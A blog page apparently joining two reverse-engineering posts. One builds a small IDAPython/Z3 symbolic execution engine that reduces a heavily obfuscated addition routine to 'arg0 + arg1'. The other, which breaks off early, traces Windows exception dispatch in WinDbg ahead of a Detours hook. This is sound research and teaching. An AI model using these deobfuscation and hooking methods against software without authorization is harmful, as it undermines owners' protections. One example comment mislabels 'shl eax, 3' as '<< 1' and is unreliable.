The idea in this post is to write a very basic symbolic execution engine in order to see what kind of result will hold the EAX register at the end of the routine. Hopefully, we will obtain something highly simplified and more readable that this bunch of assembly codes!

The symbolic execution engine approach

But in fact that piece of code makes it really easy for us to write a symbolic execution engine. Here are the main reasons:

  • there is no branches, no loops, perfect.
  • the instruction aren't playing with the EFLAGS register.
  • the instruction only used 32 bits registers (not 16 bits, or 8 bits).
  • the number of unique instruction is really small: mov, shr, shl, xor, and, xor, add.
  • the instructions used are easy to emulate.

Understand that here, we are really in a specific case, the engine wouldn't be that easy to implement to cover the most used x86 instructions ; but we are lucky, we won't need that!

The engine is in fact a pseudo-emulator that propagates the different actions done by the asm instructions. Here is how our engine works:

  1. Each time a symbolic variable is found, you instantiate a Z3 BitVector and you keep it somewhere. A symbolic variable is basically a variable that the attacker can control. For example, in our case, we will have two symbolic variables: the two arguments passed to the function. We will see later an easy heuristic to find "automatically" the symbolic variables in our case.
  2. When you have an instruction, you emulate it and you update the CPU state of the engine. If it involves an equation, you update your set of equations.
  3. You do that until the end of the routine.

Of course, when the engine has been successfully executed, you may want to ask it some questions like "what does hold the EAX register at the end of the routine?". You want to have exactly all the operations needed to compute EAX. In our case, we hope to obtain "symbolic_variable1 + symbolic_variable2".

Here is a little example to sum up what we just said:

mov eax, [arg1]  ; at this moment we have our first symbolic variable
                    ; we push it in our equations list
mov edx, [arg2]  ; same thing here

shr eax, 2   ; EAX=sym1 >> 2
add eax, 1   ; EAX=(sym1 >> 2) + 1
shl eax, 3   ; EAX=((sym1 >> 2) + 1) << 1
and eax, 2   ; EAX=(((sym1 >> 2) + 1) << 1) & 2
inc edx      ; EDX=sym2 + 1
xor edx, eax ; EDX=(sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2)
mov eax, edx ; EAX=(sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2)

So at the end, you can ask the engine to give you the final state of EAX for example and it should give you something like:

EAX=(sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2)

With that equation you are free to use Z3Py to either simplify it or to try to find how you can have a specific value in EAX controlling only the symbolic variables:

In [1]: from z3 import *
In [2]: sym1 = BitVec('sym1', 32)
In [3]: sym2 = BitVec('sym2', 32)

In [4]: simplify((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2))
Out[4]: 1 + sym2 ^ Concat(0, 1 + Extract(0, 0, sym1 >> 2), 0)

In [5]: solve((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2) == 0xdeadbeef)
[sym1 = 0, sym2 = 3735928556]

In [6]: solve((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2) == 0xdeadbeef, sym1 !=  0)
[sym1 = 1073741824, sym2 = 3735928556]

In [7]: sym1 = 1073741824
In [8]: sym2 = 3735928556

In [9]: hex((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2) & 0xffffffff)
Out[9]: '0xdeadbeefL'

As you can imagine, that kind of tool is very valuable/handy when you do reverse-engineering tasks or bug-hunting. Unfortunately, our PoC won't be enough accurate/generic/complete to be used in "normal" cases, but never mind.

Let's code

To implement our little PoC we will use only IDAPython and Z3Py.

The disassembler

The first thing we have to do is to use IDA's API in order to have some inspection information about assembly instructions. The idea is just to have the mnemonic, the source and the destination operands easily ; here is the class I've designed toward that purpose:

class Disassembler(object):
    '''A simple class to decode easily instruction in IDA'''
    def __init__(self, start, end):
        self.start = start
        self.end = end
        self.eip = start

    def _decode_instr(self):
        '''Returns mnemonic, dst, src'''
        mnem = GetMnem(self.eip)
        x = []
        for i in range(2):
            ty = GetOpType(self.eip, i)
            # cst
            if 5 <= ty <= 7:
                x.append(GetOperandValue(self.eip, i))
            else:
                x.append(GetOpnd(self.eip, i))

        return [mnem] + x

    def get_next_instruction(self):
        '''This is a convenient generator, you can iterator through
        each instructions easily'''
        while self.eip != self.end:
            yield self._decode_instr()
            self.eip += ItemSize(self.eip)

The symbolic execution engine

There are several important parts in our engine:

  1. the part which "emulates" the assembly instruction.
  2. the part which stores the different equations used through the routine. It is a simple Python dictionary: the key is a unique identifier, and the value is the equation
  3. the CPU state. We also use a dictionary for that purpose: the key will be the register names, and the value will be what the register holds at that specific moment. Note we will only store the unique identifier of the equation. In fact, our design is really similar to Jonathan's one in "Binary analysis: Concolic execution with Pin and z3", so please refer you to his cool pictures if it's not really clear :P.
  4. the memory state ; in that dictionary we store memory references. Remember, if we find a non-initialized access to a memory area we instantiate a symbolic variable. That is our heuristic to find the symbolic variables automatically.

Here is the PoC code:

def prove(f):
    '''Taken from http://rise4fun.com/Z3Py/tutorialcontent/guide#h26'''
    s = Solver()
    s.add(Not(f))
    if s.check() == unsat:
        return True
    return False

class SymbolicExecutionEngine(object):
    '''The symbolic execution engine is the class that will
    handle the symbolic execution. It will keep a track of the 
    different equations encountered, and the CPU context at each point of the program.

    The symbolic variables have to be found by the user (or using data-taing). This is not
    the purpose of this class.

    We are lucky, we only need to handle those operations & encodings:
        . mov:
            . mov reg32, reg32
            . mov reg32, [mem]
            . mov [mem], reg32
        . shr:
            . shr reg32, cst
        . shl:
            . shl reg32, cst
        . and:
            . and reg32, cst
            . and reg32, reg32
        . xor:
            . xor reg32, cst
        . or:
            . or reg32, reg32
        . add:
            . add reg32, reg32

    We also don't care about:
        . EFLAGS
        . branches
        . smaller registers (16/8 bits)
    Long story short: it's perfect ; that environment makes really easy to play with symbolic execution.'''
    def __init__(self, start, end):
        # This is the CPU context at each time
        # The value of the registers are index in the equations dictionnary
        self.ctx = {
            'eax' : None,
            'ebx' : None,
            'ecx' : None,
            'edx' : None,
            'esi' : None,
            'edi' : None,
            'ebp' : None,
            'esp' : None,
            'eip' : None
        }

        # The address where the symbolic execution will start
        self.start = start

        # The address where the symbolic execution will stop
        self.end = end

        # Our disassembler
        self.disass = Disassembler(start, end)

        # This is the memory that can be used by the instructions to save temporary values/results
        self.mem = {}

        # Each equation must have a unique id
        self.idx = 0

        # The symbolic variables will be stored there
        self.sym_variables = []

        # Each equation will be stored here
        self.equations = {}

    def _check_if_reg32(self, r):
        '''XXX: make a decorator?'''
        return r.lower() in self.ctx

    def _push_equation(self, e):
        self.equations[self.idx] = e
        self.idx += 1
        return (self.idx - 1)

    def set_reg_with_equation(self, r, e):
        if self._check_if_reg32(r) == False:
            return

        self.ctx[r] = self._push_equation(e)

    def get_reg_equation(self, r):
        if self._check_if_reg32(r) == False:
            return

        return self.equations[self.ctx[r]]

    def run(self):
        '''Run from start address to end address the engine'''
        for mnemonic, dst, src in self.disass.get_next_instruction():
            if mnemonic == 'mov':
                # mov reg32, reg32
                if src in self.ctx and dst in self.ctx:
                    self.ctx[dst] = self.ctx[src]
                # mov reg32, [mem]
                elif (src.find('var_') != -1 or src.find('arg') != -1) and dst in self.ctx:
                    if src not in self.mem:
                        # A non-initialized location is trying to be read, we got a symbolic variable!
                        sym = BitVec('arg%d' % len(self.sym_variables), 32)
                        self.sym_variables.append(sym)
                        print 'Trying to read a non-initialized area, we got a new symbolic variable: %s' % sym
                        self.mem[src] = self._push_equation(sym)

                    self.ctx[dst] = self.mem[src]
                # mov [mem], reg32
                elif dst.find('var_') != -1 and src in self.ctx:
                    if dst not in self.mem:
                        self.mem[dst] = None

                    self.mem[dst] = self.ctx[src]
                else:
                    raise Exception('This encoding of "mov" is not handled.')
            elif mnemonic == 'shr':
                # shr reg32, cst
                if dst in self.ctx and type(src) == int:
                    self.set_reg_with_equation(dst, LShR(self.get_reg_equation(dst), src))
                else:
                    raise Exception('This encoding of "shr" is not handled.')
            elif mnemonic == 'shl':
                # shl reg32, cst
                if dst in self.ctx and type(src) == int:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) << src)
                else:
                    raise Exception('This encoding of "shl" is not handled.')
            elif mnemonic == 'and':
                x = None
                # and reg32, cst
                if type(src) == int:
                    x = src
                # and reg32, reg32
                elif src in self.ctx:
                    x = self.get_reg_equation(src)
                else:
                    raise Exception('This encoding of "and" is not handled.')

                self.set_reg_with_equation(dst, self.get_reg_equation(dst) & x)
            elif mnemonic == 'xor':
                # xor reg32, cst
                if dst in self.ctx and type(src) == int:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) ^ src)
                else:
                    raise Exception('This encoding of "xor" is not handled.')
            elif mnemonic == 'or':
                # or reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) | self.get_reg_equation(src))
                else:
                    raise Exception('This encoding of "or" is not handled.')
            elif mnemonic == 'add':
                # add reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) + self.get_reg_equation(src))
                else:
                    raise Exception('This encoding of "add" is not handled.')
            else:
                print mnemonic, dst, src
                raise Exception('This instruction is not handled.')

    def get_reg_equation_simplified(self, reg):
        eq = self.get_reg_equation(reg)
        eq = simplify(eq)
        return eq

Testing

OK, we just have to instantiate the engine giving him the start/end address of the routine and to ask him to give us the final equation holded in EAX.

def main():
    '''Here we will try to attack the semantic-preserving obfuscations
    I talked about in "Obfuscation of steel: meet my Kryptonite." : http://0vercl0k.tuxfamily.org/bl0g/?p=260.

    The idea is to defeat those obfuscations using a tiny symbolic execution engine.'''
    sym = SymbolicExecutionEngine(0x804845A, 0x0804A17C)
    print 'Launching the engine..'
    sym.run()
    print 'Done, retrieving the equation in EAX, and simplifying..'
    eax = sym.get_reg_equation_simplified('eax')
    print 'EAX=%r' % eax
    return 1

if __name__ == '__main__':
    main()

And here is what I saw:

Launching the engine..
Trying to read a non-initialized area, we got a new symbolic variable: arg0
Trying to read a non-initialized area, we got a new symbolic variable: arg1
Done, retrieving the equation in EAX, and simplifying..
EAX=(~(Concat(2147483647, Extract(0, 0, arg1)) |
    Concat(2147483647, ~Extract(0, 0, arg0)) |
    4294967294) |
    ~(Concat(2147483647, ~Extract(0, 0, arg1)) |
    Concat(2147483647, Extract(0, 0, arg0)) |
    4294967294)) +
Concat(~(Concat(1073741823, Extract(1, 1, arg1)) |
            Concat(1073741823, ~Extract(1, 1, arg0)) |
            Concat(1073741823,
                ~(~Extract(0, 0, arg1) |
                    ~Extract(0, 0, arg0)))) |
        ~(Concat(1073741823, ~Extract(1, 1, arg1)) |
            Concat(1073741823, Extract(1, 1, arg0)) |
            Concat(1073741823,
                ~(~Extract(0, 0, arg1) |
                    ~Extract(0, 0, arg0)))) |
        ~(Concat(1073741823, Extract(1, 1, arg1)) |
            Concat(1073741823, Extract(1, 1, arg0)) |
            Concat(1073741823, ~Extract(0, 0, arg1)) |
            Concat(1073741823, ~Extract(0, 0, arg0)) |
            2147483646) |
        ~(Concat(1073741823, ~Extract(1, 1, arg1)) |
            Concat(1073741823, ~Extract(1, 1, arg0)) |
            Concat(1073741823, ~Extract(0, 0, arg1)) |
            Concat(1073741823, ~Extract(0, 0, arg0)) |
            2147483646),
        0) +
...

There was two possible explanations for this problem:

  • my code is wrong, and it generates equations not simplify-able.
  • my code is right, and Z3Py's simplify method has a hard time to simplify it.

To know what was the right answer, I used Z3Py's prove function in order to know if the equation was equivalent to a simple addition:

def main():
    '''Here we will try to attack the semantic-preserving obfuscations
    I talked about in "Obfuscation of steel: meet my Kryptonite." : http://0vercl0k.tuxfamily.org/bl0g/?p=260.

    The idea is to defeat those obfuscations using a tiny symbolic execution engine.'''
    sym = SymbolicExecutionEngine(0x804845A, 0x0804A17C)
    print 'Launching the engine..'
    sym.run()
    print 'Done, retrieving the equation in EAX, and simplifying..'
    eax = sym.get_reg_equation_simplified('eax')
    print prove(eax == Sum(sym.sym_variables))
    return 1

if __name__ == '__main__':
    main()

Fortunately for us, it printed True ; so our code is correct. But it also means, the simplify function, as is at least, isn't able to simplify that bunch of equations involving bit-vector arithmetics. I still haven't found a clean way to make Z3Py simplify my big equation, so if someone knows how I can do that please contact me. I've also exported the complete equation, and uploaded it here ; you are free to give it a try like this.

The ugly trick I came up with is just to use Z3Py's prove function, to try to prove that the equation is in fact an addition and if this is the case it returns the simplified equation. Again, if someone manages to simplify the previous equation without that type of trick I'm really interested!

def _simplify_additions(self, eq):
    '''The idea in this function is to help Z3 to simplify our big bitvec-arithmetic
    expression. It's simple, in eq we have a big expression with two symbolic variables (arg0 & arg1)
    and a lot of bitvec arithmetic. Somehow, the simplify function is not clever enough to reduce the
    equation.

    The idea here is to use the prove function in order to see if we can simplify an equation by an addition of the
    symbolic variables.'''
    # The two expressions are equivalent ; we got a simplification!
    if prove(Sum(self.sym_variables) == eq):
        return Sum(self.sym_variables)

    return eq

def get_reg_equation_simplified(self, reg):
    eq = self.get_reg_equation(reg)
    eq = simplify(self._simplify_additions(eq))
    return eq

And now if you relaunch the script you will get:

Launching the engine..
Trying to read a non-initialized area, we got a new symbolic variable: arg0
Trying to read a non-initialized area, we got a new symbolic variable: arg1
Done, retrieving the equation in EAX, and simplifying..
EAX=arg0 + arg1

We just successfully simplified two thousands of assembly into a simple addition, wonderful!

Symbolic execution VS Kryptonite

OK, now we have a working engine able to break a small program (~two thousands instructions), let's see if we can do the same with a kryptonized-binary. Let's take a simple addition like in the previous parts:

#include <stdio.h>
#include <stdlib.h>

unsigned int add(unsigned int a, unsigned int b)
{
    return a + b;
}

int main(int argc, char* argv[])
{
    if(argc != 3)
        return 0;

    printf("Result: %u\n", add(atoll(argv[1]), atoll(argv[2])));
    return 1;
}

Now, time for a kryptonization:

$ wget https://raw.github.com/0vercl0k/stuffz/master/llvm-funz/kryptonite/llvm-functionpass-kryptonite-obfuscater.cpp
$ clang++ llvm-functionpass-kryptonite-obfuscater.cpp `llvm-config --cxxflags --ldflags --libs core` -shared -o llvm-functionpass-kryptonite-obfuscater.so
$ clang -S -emit-llvm add.c -o add.ll
$ opt -S -load ~/dev/llvm-functionpass-kryptonite-obfuscater.so -kryptonite -heavy-add-obfu add.ll -o add.opti.ll && mv add.opti.ll add.ll
$ opt -S -load ~/dev/llvm-functionpass-kryptonite-obfuscater.so -kryptonite -heavy-add-obfu add.ll -o add.opti.ll && mv add.opti.ll add.ll
$ llc -O0 -filetype=obj -march=x86 add.ll -o add.o
$ clang -static add.o -o kryptonite-add
$ strip --strip-all ./kryptonite-add

At this moment we end up with that binary: kryptonite-add. The target routine for our study starts at 0x804823C and ends at 0x08072284 ; roughly more than 40 thousands assembly instructions and kind of big right?

Here is our final IDAPython script after some minor adjustments (added one or two more instructions):

class EquationId(object):
    def __init__(self, id_):
        self.id = id_

    def __repr__(self):
        return 'EID:%d' % self.id

class Disassembler(object):
    '''A simple class to decode easily instruction in IDA'''
    def __init__(self, start, end):
        self.start = start
        self.end = end
        self.eip = start

    def _decode_instr(self):
        '''Returns mnemonic, dst, src'''
        mnem = GetMnem(self.eip)
        x = []
        for i in range(2):
            ty = GetOpType(self.eip, i)
            # cst
            if 5 <= ty <= 7:
                x.append(GetOperandValue(self.eip, i))
            else:
                x.append(GetOpnd(self.eip, i))

        return [mnem] + x

    def get_next_instruction(self):
        '''This is a convenient generator, you can iterator through
        each instructions easily'''
        while self.eip != self.end:
            yield self._decode_instr()
            self.eip += ItemSize(self.eip)

class SymbolicExecutionEngine(object):
    '''The symbolic execution engine is the class that will
    handle the symbolic execution. It will keep a track of the 
    different equations encountered, and the CPU context at each point of the program.

    The symbolic variables have to be found by the user (or using data-taing). This is not
    the purpose of this class.

    We are lucky, we only need to handle those operations & encodings:
        . mov:
            . mov reg32, reg32
            . mov reg32, [mem]
            . mov [mem], reg32
            . mov reg32, cst
        . shr:
            . shr reg32, cst
        . shl:
            . shl reg32, cst
        . and:
            . and reg32, cst
            . and reg32, reg32
        . xor:
            . xor reg32, cst
        . or:
            . or reg32, reg32
        . add:
            . add reg32, reg32
            . add reg32, cst

    We also don't care about:
        . EFLAGS
        . branches
        . smaller registers (16/8 bits)
    Long story short: it's perfect ; that environment makes really easy to play with symbolic execution.'''
    def __init__(self, start, end):
        # This is the CPU context at each time
        # The value of the registers are index in the equations dictionnary
        self.ctx = {
            'eax' : None,
            'ebx' : None,
            'ecx' : None,
            'edx' : None,
            'esi' : None,
            'edi' : None,
            'ebp' : None,
            'esp' : None,
            'eip' : None
        }

        # The address where the symbolic execution will start
        self.start = start

        # The address where the symbolic execution will stop
        self.end = end

        # Our disassembler
        self.disass = Disassembler(start, end)

        # This is the memory that can be used by the instructions to save temporary values/results
        self.mem = {}

        # Each equation must have a unique id
        self.idx = 0

        # The symbolic variables will be stored there
        self.sym_variables = []

        # Each equation will be stored here
        self.equations = {}

        # Number of instructions emulated
        self.ninstrs = 0

    def _check_if_reg32(self, r):
        '''XXX: make a decorator?'''
        return r.lower() in self.ctx

    def _push_equation(self, e):
        idx = EquationId(self.idx)
        self.equations[idx] = e
        self.idx += 1
        return idx

    def set_reg_with_equation(self, r, e):
        if self._check_if_reg32(r) == False:
            return

        self.ctx[r] = self._push_equation(e)

    def get_reg_equation(self, r):
        if self._check_if_reg32(r) == False:
            return

        if isinstance(self.ctx[r], EquationId):
            return self.equations[self.ctx[r]]
        else:
            return self.ctx[r]

    def run(self):
        '''Run from start address to end address the engine'''
        for mnemonic, dst, src in self.disass.get_next_instruction():
            if (self.ninstrs % 5000) == 0 and self.ninstrs > 0:
                print '%d instructions, %d equations so far...' % (self.ninstrs, len(self.equations))

            if mnemonic == 'mov':
                # mov reg32, imm32
                if dst in self.ctx and isinstance(src, (int, long)):
                    self.ctx[dst] = src
                # mov reg32, reg32
                elif src in self.ctx and dst in self.ctx:
                    self.ctx[dst] = self.ctx[src]
                # mov reg32, [mem]
                elif (src.find('var_') != -1 or src.find('arg') != -1) and dst in self.ctx:
                    if src not in self.mem:
                        # A non-initialized location is trying to be read, we got a symbolic variable!
                        sym = BitVec('arg%d' % len(self.sym_variables), 32)
                        self.sym_variables.append(sym)
                        print 'Trying to read a non-initialized area, we got a new symbolic variable: %s' % sym
                        self.mem[src] = self._push_equation(sym)

                    self.ctx[dst] = self.mem[src]
                # mov [mem], reg32
                elif dst.find('var_') != -1 and src in self.ctx:
                    self.mem[dst] = self.ctx[src]
                else:
                    raise Exception('This encoding of "mov" is not handled.')
            elif mnemonic == 'shr':
                # shr reg32, cst
                if dst in self.ctx and isinstance(src, (int, long)):
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) >> src)
                else:
                    raise Exception('This encoding of "shr" is not handled.')
            elif mnemonic == 'shl':
                # shl reg32, cst
                if dst in self.ctx and isinstance(src, (int, long)):
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) << src)
                else:
                    raise Exception('This encoding of "shl" is not handled.')
            elif mnemonic == 'and':
                # and reg32, cst
                if isinstance(src, (int, long)):
                    x = src
                # and reg32, reg32
                elif src in self.ctx:
                    x = self.get_reg_equation(src)
                else:
                    raise Exception('This encoding of "and" is not handled.')

                self.set_reg_with_equation(dst, self.get_reg_equation(dst) & x)
            elif mnemonic == 'xor':
                # xor reg32, cst
                if dst in self.ctx and isinstance(src, (int, long)):
                    if self.ctx[dst] not in self.equations:
                        self.ctx[dst] ^= src
                    else:
                        self.set_reg_with_equation(dst, self.get_reg_equation(dst) ^ src)
                else:
                    raise Exception('This encoding of "xor" is not handled.')
            elif mnemonic == 'or':
                # or reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) | self.get_reg_equation(src))
                else:
                    raise Exception('This encoding of "or" is not handled.')
            elif mnemonic == 'add':
                # add reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) + self.get_reg_equation(src))
                # add reg32, cst
                elif dst in self.ctx and isinstance(src, (int, long)):
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) + src)
                else:
                    raise Exception('This encoding of "add" is not handled.')
            else:
                print mnemonic, dst, src
                raise Exception('This instruction is not handled.')

            self.ninstrs += 1

    def _simplify_additions(self, eq):
        '''The idea in this function is to help Z3 to simplify our big bitvec-arithmetic
        expression. It's simple, in eq we have a big expression with two symbolic variables (arg0 & arg1)
        and a lot of bitvec arithmetic. Somehow, the simplify function is not clever enough to reduce the
        equation.

        The idea here is to use the prove function in order to see if we can simplify an equation by an addition of the
        symbolic variables.'''
        # The two expressions are equivalent ; we got a simplification!
        if prove_(Sum(self.sym_variables) == eq):
            return Sum(self.sym_variables)

        return eq

    def get_reg_equation_simplified(self, reg):
        eq = self.get_reg_equation(reg)
        eq = simplify(self._simplify_additions(eq))
        return eq


def main():
    '''Here we will try to attack the semantic-preserving obfuscations
    I talked about in "Obfuscation of steel: meet my Kryptonite." : http://0vercl0k.tuxfamily.org/bl0g/?p=260.

    The idea is to defeat those obfuscations using a tiny symbolic execution engine.'''
    # sym = SymbolicExecutionEngine(0x804845A, 0x0804A17C) # for simple adder
    sym = SymbolicExecutionEngine(0x804823C, 0x08072284) # adder kryptonized
    print 'Launching the engine..'
    sym.run()
    print 'Done. %d equations built, %d assembly lines emulated, %d virtual memory cells used' % (len(sym.equations), sym.ninstrs, len(sym.mem))
    print 'CPU state at the end:'
    print sym.ctx
    print 'Retrieving and simplifying the EAX register..'
    eax = sym.get_reg_equation_simplified('eax')
    print 'EAX=%r' % eax
    return 1

if __name__ == '__main__':
    main()

And here is the final output:

Launching the engine..
Trying to read a non-initialized area, we got a new symbolic variable: arg0
Trying to read a non-initialized area, we got a new symbolic variable: arg1
5000 instructions, 2263 equations so far...
10000 instructions, 4832 equations so far...
15000 instructions, 7228 equations so far...
20000 instructions, 9766 equations so far...
25000 instructions, 12212 equations so far...
30000 instructions, 14762 equations so far...
35000 instructions, 17255 equations so far...
40000 instructions, 19801 equations so far...
Done. 19857 equations built, 40130 assembly lines emulated, 5970 virtual memory cells used
CPU state at the end:
{'eax': EID:19856, 'ebp': None, 'eip': None, 'esp': None, 'edx': EID:19825, 'edi': EID:19796, 'ebx': EID:19797, 'esi': EID:19823, 'ecx': EID:19856}
Retrieving and simplifying the EAX register..
EAX=arg0 + arg1

Conclusion

I hope you did enjoy this little introduction to symbolic execution, and how it can be very valuable to remove some semantic-preserving obfuscations. We also have seen that this PoC is not really elaborate: it doesn't handle loops or any branches, doesn't care about EFLAGS, etc ; but it was enough to break our two examples. I hope you also enjoyed the examples used to showcase our tiny symbolic execution engine.

If you want to go further with symbolic execution, here is a list of nice articles:

PS: By the way, for those who like weird machines, I've managed to code a MOV/JMP turing machine based on mov is Turing-complete here: fun_with_mov_turing_completeness.cpp!

Having a look at the Windows' User/Kernel exceptions dispatcher

Introduction

The purpose of this little post is to create a piece of code able to monitor exceptions raised in a process (a bit like gynvael's ExcpHook but in userland), and to generate a report with information related to the exception. The other purpose is to have a look at the internals of course.

--Exception detected--
ExceptionRecord: 0x0028fa2c Context: 0x0028fa7c
Image Path: D:\Codes\The Sentinel\tests\divzero.exe
Command Line: ..\tests\divzero.exe divzero.exe
PID: 0x00000aac
Exception Code: 0xc0000094 (EXCEPTION_INT_DIVIDE_BY_ZERO)
Exception Address: 0x00401359
EAX: 0x0000000a EDX: 0x00000000 ECX: 0x00000001 EBX: 0x7ffde000
ESI: 0x00000000 EDI: 0x00000000 ESP: 0x0028fee0 EBP: 0x0028ff18
EIP: 0x00401359
EFLAGS: 0x00010246

Stack:
0x767bc265 0x54f3620f 0xfffffffe 0x767a0f5a 
0x767ffc59 0x004018b0 0x0028ff90 0x00000000

Disassembly:
00401359 (04) f77c241c                 IDIV DWORD [ESP+0x1c]
0040135d (04) 89442404                 MOV [ESP+0x4], EAX
00401361 (07) c7042424304000           MOV DWORD [ESP], 0x403024
00401368 (05) e833080000               CALL 0x401ba0
0040136d (05) b800000000               MOV EAX, 0x0

That's why I divided this post in two big parts:

  • the first one will talk about Windows internals background required to understand how things work under the hood,
  • the last one will talk about Detours and how to hook ntdll!KiUserExceptionDispatcher toward our purpose. Basically, the library gives programmers a set of APIs to easily hook procedures. It also has a clean and readable documentation, so you should use it! It is usually used for that kind of things:
  • Hot-patching bugs (no need to reboot),
  • Tracing API calls (API Monitor like),
  • Monitoring (a bit like our example),
  • Pseudo-sandboxing (prevent API calls),
  • etc.

Lights on ntdll!KiUserExceptionDispatcher

The purpose of this part is to be sure to understand how exceptions are given back to userland in order to be handled (or not) by the [SEH](http://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx)/[UEF](http://msdn.microsoft.com/en-us/library/windows/desktop/ms681401(v=vs.85).aspx) mechanisms ; though I'm going to focus on Windows 7 x86 because that's the OS I run in my VM. The other objective of this part is to give you the big picture, I mean we are not going into too many details, just enough to write a working exception sentinel PoC later.

nt!KiTrap*

When your userland application does something wrong an exception is raised by your CPU: let's say you are trying to do a division by zero (nt!KiTrap00 will handle that case), or you are trying to fetch a memory page that doesn't exist (nt!KiTrap0E).

kd> !idt -a

Dumping IDT: 80b95400

00:   8464d200 nt!KiTrap00
01:   8464d390 nt!KiTrap01
02:   Task Selector = 0x0058
03:   8464d800 nt!KiTrap03
04:   8464d988 nt!KiTrap04
05:   8464dae8 nt!KiTrap05
06:   8464dc5c nt!KiTrap06
07:   8464e258 nt!KiTrap07
08:   Task Selector = 0x0050
09:   8464e6b8 nt!KiTrap09
0a:   8464e7dc nt!KiTrap0A
0b:   8464e91c nt!KiTrap0B
0c:   8464eb7c nt!KiTrap0C
0d:   8464ee6c nt!KiTrap0D
0e:   8464f51c nt!KiTrap0E
0f:   8464f8d0 nt!KiTrap0F
10:   8464f9f4 nt!KiTrap10
11:   8464fb34 nt!KiTrap11
[...]

I'm sure you already know that but in x86 Intel processors there is a table called the IDT that stores the different routines that will handle the exceptions. The virtual address of that table is stored in a special x86 register called IDTR, and that register is accessible only by using the instructions sidt (Stores Interrupt Descriptor Table register) and lidt (Loads Interrupt Descriptor Table register).

Basically there are two important things in an IDT entry: the address of the ISR, and the segment selector (remember it's a simple index in the GDT) the CPU should use.

kd> !pcr
KPCR for Processor 0 at 84732c00:
    [...]
                    IDT: 80b95400
                    GDT: 80b95000

kd> dt nt!_KIDTENTRY 80b95400
    +0x000 Offset           : 0xd200
    +0x002 Selector         : 8
    +0x004 Access           : 0x8e00
    +0x006 ExtendedOffset   : 0x8464

kd> ln (0x8464 << 10) + (0xd200)
Exact matches:
    nt!KiTrap00 (<no parameter info>)

kd> !@display_gdt 80b95000

#################################
# Global Descriptor Table (GDT) #
#################################

Processor 00
Base : 80B95000    Limit : 03FF

Off.  Sel.  Type    Sel.:Base  Limit   Present  DPL  AVL  Informations
----  ----  ------  ---------  ------- -------  ---  ---  ------------
[...]
0008  0008  Code32  00000000  FFFFFFFF  YES     0    0    Execute/Read, accessed  (Ring 0)CS=0008
[...]

The entry just above tells us that for the processor 0, if a division-by-zero exception is raised the kernel mode routine nt!KiTrap00 will be called with a flat-model code32 ring0 segment (cf GDT dump).

Once the CPU is in nt!KiTrap00's code it basically does a lot of things, same thing for all the other nt!KiTrap routines, but somehow they (more or less) end up in the kernel mode exceptions dispatcher: nt!KiDispatchException (remember gynvael's tool ? He was hooking that method!) once they created the nt!_KTRAP_FRAME structure associated with the fault.

nt!KiExceptionDispatch graph from ReactOS
Now, you may already have asked yourself how the kernel reaches back to the userland in order to process the exception via the SEH mechanism for example ?

That's kind of simple actually. The trick used by the Windows kernel is to check where the exception took place: if it's from user mode, the kernel mode exceptions dispatcher sets the field eip of the trap frame structure (passed in argument) to the symbol nt!KeUserExceptionDispatcher. Then, nt!KeEloiHelper will use that same trap frame to resume the execution (in our case on nt!KeUserExceptionDispatcher).

But guess what ? That symbol holds the address of ntdll!KiUserExceptionDispatcher, so it makes total sense!

kd> dps nt!KeUserExceptionDispatcher L1
847a49a0  77476448 ntdll!KiUserExceptionDispatcher

If like me you like illustrations, I've made a WinDbg session where I am going to show what we just talked about. First, let's trigger our division-by-zero exception:

kd> bp nt!KiTrap00

kd> g
Breakpoint 0 hit
nt!KiTrap00:
8464c200 6a00            push    0

kd> k
ChildEBP RetAddr  
8ec9bd98 01141269 nt!KiTrap00
8ec9bd9c 00000000 divzero+0x1269

kd> u divzero+0x1269 l1
divzero+0x1269:
01141269 f7f0            div     eax,eax

Now let's go a bit further in the ISR, and more precisely when the nt!_KTRAP_FRAME is built:

kd> bp nt!KiTrap00+0x36

kd> g
Breakpoint 1 hit
nt!KiTrap00+0x36:
8464c236 8bec            mov     ebp,esp

kd> dt nt!_KTRAP_FRAME @esp
    +0x000 DbgEbp           : 0x1141267
    +0x004 DbgEip           : 0x1141267
    +0x008 DbgArgMark       : 0
    +0x00c DbgArgPointer    : 0
    +0x010 TempSegCs        : 0
    +0x012 Logging          : 0 ''
    +0x013 Reserved         : 0 ''
    +0x014 TempEsp          : 0
    +0x018 Dr0              : 0
    +0x01c Dr1              : 0
    +0x020 Dr2              : 0
    +0x024 Dr3              : 0x23
    +0x028 Dr6              : 0x23
    +0x02c Dr7              : 0x1141267
    +0x030 SegGs            : 0
    +0x034 SegEs            : 0x23
    +0x038 SegDs            : 0x23
    +0x03c Edx              : 0x1141267
    +0x040 Ecx              : 0
    +0x044 Eax              : 0
    +0x048 PreviousPreviousMode : 0
    +0x04c ExceptionList    : 0xffffffff _EXCEPTION_REGISTRATION_RECORD
    +0x050 SegFs            : 0x270030
    +0x054 Edi              : 0
    +0x058 Esi              : 0
    +0x05c Ebx              : 0x7ffd3000
    +0x060 Ebp              : 0x27fd58
    +0x064 ErrCode          : 0
    +0x068 Eip              : 0x1141269
    +0x06c SegCs            : 0x1b
    +0x070 EFlags           : 0x10246
    +0x074 HardwareEsp      : 0x27fd50
    +0x078 HardwareSegSs    : 0x23
    +0x07c V86Es            : 0
    +0x080 V86Ds            : 0
    +0x084 V86Fs            : 0
    +0x088 V86Gs            : 0

kd> .trap @esp
ErrCode = 00000000
